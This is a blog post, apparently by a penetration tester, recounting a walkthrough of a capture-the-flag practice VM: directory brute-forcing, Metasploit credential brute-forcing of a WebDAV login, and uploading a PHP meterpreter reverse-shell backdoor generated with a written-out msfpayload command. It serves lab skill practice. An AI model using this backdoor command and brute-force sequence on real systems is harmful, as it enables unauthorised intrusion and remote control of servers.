From time to time we all go through periods of lulls. In most cases, it may be work or personal related, but I always feel that it is a good idea to keep working on your skills, even if your current job is not what you want it to be, career wise. For example, the other day I was checking LinkedIn and came across a post about a new “CTF” VMware framework on one of the Pentesting groups I belong to. It was touted as a victim machine that had a simple and more “advanced” version, however I think the VM I downloaded was fairly straight forward. More or less, I used it as an excuse to play around and “sharpen my knife”.
After downloading the VM, I was presented with fairly simple webpage that displayed “images”, basically it was some sort of photo album. The album allowed you to search images, register a new user, and login/logout. After scanning the system with Nmap, I found no additional ports besides SSH and HTTP. So I then proceeded to perform basic web attacks (e.g. XSS, SQLi, Command Injection, etc.). After trying some of those basic attacks, I started to think about, what if this wasn’t the actual “vulnerable” site, but just a decoy. I pulled up my trusty go-to tool, dirbuster. If you have not used dirbuster, it basically allows you to “brute-force” file and folder locations.
After letting dirbuster do its thing, I was intrigued by the directory “/webdav/” and was presented with a login prompt. I tried a few simple user/passwords combinations (e.g. admin/admin, admin/password, etc.).
After a few failed attempts, I decided to use the metasploit “auxiliary/scanner/http/http_login” module to see if I can find a correct pair. I have a few word-lists that I use, but in this case you can use the defaul MSF lists.
BAM!!! We find a successful user/password.
After logging-in we are presented with a blank page.
So I decided to use cadaver to login and see what we can do with the server.
Once I was in, I wanted to see if I had full permissions to upload a file. I did a “mkcol test”, which made a collection named test. Now we can make a backdoor and see if we can get a shell on the box. Using MSF, I made a php backdoor.
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=80 R > backdoor.php
Then back in the cadaver window, I issued “put /root/ods/backdoor.php” command to upload it to the server. Now we can setup metasploit to catch our payload using “multi handler”, browsed to the file and we have a session…simple as that.
Nothing super ground breaking, but going through the process of learning new environments, will only help you “sharpen your knife”. You can learn more about the people that made this VM, here and can download the VM, here.